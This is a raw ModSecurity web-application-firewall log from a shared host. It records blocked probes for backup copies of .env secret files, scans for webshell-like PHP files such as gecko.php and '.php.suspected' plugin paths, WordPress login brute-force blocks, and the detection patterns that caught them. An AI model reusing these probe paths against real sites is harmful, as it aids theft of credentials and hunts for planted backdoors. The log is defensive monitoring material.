[Tue May 26 17:47:51.562062 2026] [security2:error] [pid 924957:tid 925161] [client 208.84.100.114:25624] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.orig"] [unique_id "ahWPb-Yv2AvxeXULfJdyTgAAAEo"]
[Tue May 26 17:47:51.562088 2026] [security2:error] [pid 924957:tid 925199] [client 208.84.100.114:25574] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.copy"] [unique_id "ahWPb-Yv2AvxeXULfJdyTQAAAHA"]
[Tue May 26 17:47:51.562309 2026] [security2:error] [pid 924957:tid 925207] [client 208.84.100.114:25586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.old"] [unique_id "ahWPb-Yv2AvxeXULfJdyUAAAAHg"]
[Tue May 26 17:47:51.566297 2026] [security2:error] [pid 924957:tid 925210] [client 208.84.100.114:25580] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production.bak"] [unique_id "ahWPb-Yv2AvxeXULfJdyUwAAAHs"]
[Tue May 26 17:47:51.589552 2026] [security2:error] [pid 924957:tid 925189] [client 208.84.100.114:25466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.old"] [unique_id "ahWPb-Yv2AvxeXULfJdyVgAAAGY"]
[Tue May 26 17:47:51.589875 2026] [security2:error] [pid 924957:tid 925160] [client 208.84.100.114:25530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.old"] [unique_id "ahWPb-Yv2AvxeXULfJdyXgAAAEk"]
[Tue May 26 17:47:51.589939 2026] [security2:error] [pid 924957:tid 925109] [client 208.84.100.114:25470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.backup"] [unique_id "ahWPb-Yv2AvxeXULfJdyWgAAABY"]
[Tue May 26 17:47:51.590368 2026] [security2:error] [pid 924957:tid 925134] [client 208.84.100.114:25484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env~"] [unique_id "ahWPb-Yv2AvxeXULfJdyVQAAAC8"]
[Tue May 26 17:47:51.590372 2026] [security2:error] [pid 924957:tid 925201] [client 208.84.100.114:25506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.copy"] [unique_id "ahWPb-Yv2AvxeXULfJdyVwAAAHI"]
[Tue May 26 17:47:51.590450 2026] [security2:error] [pid 924957:tid 925186] [client 208.84.100.114:25502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.orig"] [unique_id "ahWPb-Yv2AvxeXULfJdyWwAAAGM"]
[Tue May 26 17:47:51.590471 2026] [security2:error] [pid 924957:tid 925116] [client 208.84.100.114:25492] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.swp"] [unique_id "ahWPb-Yv2AvxeXULfJdyWAAAAB0"]
[Tue May 26 17:47:51.591233 2026] [security2:error] [pid 924957:tid 925090] [client 208.84.100.114:25452] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.bak"] [unique_id "ahWPb-Yv2AvxeXULfJdyXAAAAAM"]
[Tue May 26 17:47:51.591363 2026] [security2:error] [pid 924957:tid 925175] [client 208.84.100.114:25540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.backup"] [unique_id "ahWPb-Yv2AvxeXULfJdyXwAAAFg"]
[Tue May 26 17:47:51.591466 2026] [security2:error] [pid 924957:tid 925152] [client 208.84.100.114:25522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.bak"] [unique_id "ahWPb-Yv2AvxeXULfJdyXQAAAEE"]
[Tue May 26 17:47:51.593001 2026] [security2:error] [pid 924957:tid 925146] [client 208.84.100.114:25606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.production~"] [unique_id "ahWPb-Yv2AvxeXULfJdyZQAAADs"]
[Tue May 26 17:47:51.593633 2026] [security2:error] [pid 924957:tid 925158] [client 208.84.100.114:25636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "shardagalaxy.com"] [uri "/.env.local.swp"] [unique_id "ahWPb-Yv2AvxeXULfJdyZgAAAEc"]
[Tue May 26 17:47:52.582011 2026] [security2:error] [pid 924957:tid 925114] [client 4.228.83.111:45173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPcOYv2AvxeXULfJdyjQAAABs"]
[Tue May 26 17:47:52.773669 2026] [security2:error] [pid 924957:tid 925199] [client 4.228.83.111:45173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPcOYv2AvxeXULfJdylgAAAHA"]
[Tue May 26 17:47:52.805656 2026] [security2:error] [pid 924957:tid 925054] [remote 193.37.33.216:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 216.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWPcOYv2AvxeXULfJdyjgAAEGA"]
[Tue May 26 17:47:52.815772 2026] [security2:error] [pid 924957:tid 925209] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdySQAAAHo"]
[Tue May 26 17:47:52.933541 2026] [security2:error] [pid 924957:tid 925174] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdyVAAAAFc"]
[Tue May 26 17:47:52.939350 2026] [security2:error] [pid 924957:tid 925119] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdycwAAACA"]
[Tue May 26 17:47:52.971285 2026] [security2:error] [pid 924957:tid 925100] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdybwAAAA0"]
[Tue May 26 17:47:52.974944 2026] [security2:error] [pid 924957:tid 925194] [client 4.228.83.111:45173] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/222.php"] [unique_id "ahWPcOYv2AvxeXULfJdylwAAAGs"]
[Tue May 26 17:47:52.975051 2026] [security2:error] [pid 924957:tid 925194] [client 4.228.83.111:45173] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/222.php"] [unique_id "ahWPcOYv2AvxeXULfJdylwAAAGs"]
[Tue May 26 17:47:52.978731 2026] [security2:error] [pid 924957:tid 925107] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdycAAAABQ"]
[Tue May 26 17:47:52.991451 2026] [security2:error] [pid 924957:tid 925211] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdybAAAAHw"]
[Tue May 26 17:47:53.007346 2026] [security2:error] [pid 924957:tid 925187] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdycQAAAGQ"]
[Tue May 26 17:47:53.010480 2026] [security2:error] [pid 924957:tid 925197] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPb-Yv2AvxeXULfJdybgAAAG4"]
[Tue May 26 17:47:53.119339 2026] [security2:error] [pid 924957:tid 925128] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPcOYv2AvxeXULfJdylQAAACk"]
[Tue May 26 17:47:53.420279 2026] [security2:error] [pid 924957:tid 925144] [client 208.84.100.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahWPcOYv2AvxeXULfJdygwAAADk"]
[Tue May 26 17:47:54.138337 2026] [security2:error] [pid 924957:tid 925130] [client 4.228.83.111:38028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahWPcuYv2AvxeXULfJdyuQAAACs"]
[Tue May 26 17:47:54.138419 2026] [security2:error] [pid 924957:tid 925130] [client 4.228.83.111:38028] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/chosen.php"] [unique_id "ahWPcuYv2AvxeXULfJdyuQAAACs"]
[Tue May 26 17:47:54.363589 2026] [security2:error] [pid 924957:tid 925116] [client 20.151.111.128:11927] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWPcuYv2AvxeXULfJdywAAAAB0"]
[Tue May 26 17:47:55.800661 2026] [security2:error] [pid 924957:tid 925156] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPc-Yv2AvxeXULfJdy6AAAAEU"]
[Tue May 26 17:47:56.524961 2026] [security2:error] [pid 924957:tid 925160] [client 4.228.83.111:38063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/info.php"] [unique_id "ahWPdOYv2AvxeXULfJdzAwAAAEk"]
[Tue May 26 17:47:56.525066 2026] [security2:error] [pid 924957:tid 925160] [client 4.228.83.111:38063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/info.php"] [unique_id "ahWPdOYv2AvxeXULfJdzAwAAAEk"]
[Tue May 26 17:47:58.107082 2026] [security2:error] [pid 924957:tid 925205] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPdeYv2AvxeXULfJdzHwAAAHY"]
[Tue May 26 17:47:59.525123 2026] [security2:error] [pid 924957:tid 925108] [client 20.151.111.128:2986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWPd-Yv2AvxeXULfJdzVQAAABU"]
[Tue May 26 17:47:59.862350 2026] [security2:error] [pid 924957:tid 925148] [client 4.228.83.111:45156] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPd-Yv2AvxeXULfJdzYAAAAD0"]
[Tue May 26 17:48:00.057784 2026] [security2:error] [pid 924957:tid 925152] [client 4.228.83.111:45156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahWPeOYv2AvxeXULfJdzawAAAEE"]
[Tue May 26 17:48:00.057871 2026] [security2:error] [pid 924957:tid 925152] [client 4.228.83.111:45156] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-includes/ID3/index.php"] [unique_id "ahWPeOYv2AvxeXULfJdzawAAAEE"]
[Tue May 26 17:48:00.476418 2026] [security2:error] [pid 924957:tid 925120] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPeOYv2AvxeXULfJdzbAAAACE"]
[Tue May 26 17:48:01.891237 2026] [security2:error] [pid 924957:tid 925076] [remote 114.119.132.173:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/option-hni.php"] [unique_id "ahWPeeYv2AvxeXULfJdzkQAARHY"], referer: https://www.stockmarketanalysis.in/services.php
[Tue May 26 17:48:01.933862 2026] [security2:error] [pid 924957:tid 925089] [client 4.228.83.111:38074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/network/index.php"] [unique_id "ahWPeeYv2AvxeXULfJdzkgAAAAI"]
[Tue May 26 17:48:01.933986 2026] [security2:error] [pid 924957:tid 925089] [client 4.228.83.111:38074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-admin/network/index.php"] [unique_id "ahWPeeYv2AvxeXULfJdzkgAAAAI"]
[Tue May 26 17:48:02.283229 2026] [security2:error] [pid 924957:tid 925149] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPeeYv2AvxeXULfJdzkAAAAD4"]
[Tue May 26 17:48:04.154234 2026] [security2:error] [pid 924957:tid 925110] [client 4.228.83.111:45181] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWPfOYv2AvxeXULfJdz5AAAABc"]
[Tue May 26 17:48:04.154322 2026] [security2:error] [pid 924957:tid 925110] [client 4.228.83.111:45181] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/file.php"] [unique_id "ahWPfOYv2AvxeXULfJdz5AAAABc"]
[Tue May 26 17:48:04.405053 2026] [security2:error] [pid 924957:tid 925120] [client 104.28.155.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWPfOYv2AvxeXULfJdz6AAAACE"]
[Tue May 26 17:48:04.789359 2026] [security2:error] [pid 924957:tid 925184] [client 154.30.70.93:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWPfOYv2AvxeXULfJdz4wAAAGE"]
[Tue May 26 17:48:05.155014 2026] [security2:error] [pid 924957:tid 924980] [remote 5.42.158.148:46194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPfOYv2AvxeXULfJd0BAAAExY"]
[Tue May 26 17:48:05.156777 2026] [security2:error] [pid 924957:tid 925159] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPfOYv2AvxeXULfJdz_AAAAEg"]
[Tue May 26 17:48:05.621914 2026] [security2:error] [pid 924957:tid 925175] [client 4.228.83.111:45178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPfeYv2AvxeXULfJd0IAAAAFg"]
[Tue May 26 17:48:06.301171 2026] [security2:error] [pid 924957:tid 925164] [client 4.228.83.111:45178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/403.php"] [unique_id "ahWPfuYv2AvxeXULfJd0LgAAAE0"]
[Tue May 26 17:48:06.301308 2026] [security2:error] [pid 924957:tid 925164] [client 4.228.83.111:45178] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/403.php"] [unique_id "ahWPfuYv2AvxeXULfJd0LgAAAE0"]
[Tue May 26 17:48:07.622565 2026] [security2:error] [pid 924957:tid 925167] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPf-Yv2AvxeXULfJd0VwAAAFA"]
[Tue May 26 17:48:07.775568 2026] [security2:error] [pid 924957:tid 925127] [client 4.228.83.111:38043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPf-Yv2AvxeXULfJd0bwAAACg"]
[Tue May 26 17:48:07.975671 2026] [security2:error] [pid 924957:tid 925140] [client 4.228.83.111:38043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPf-Yv2AvxeXULfJd0iwAAADU"]
[Tue May 26 17:48:08.153536 2026] [security2:error] [pid 924957:tid 925132] [client 4.228.83.111:38043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/gecko.php"] [unique_id "ahWPgOYv2AvxeXULfJd0jQAAAC0"]
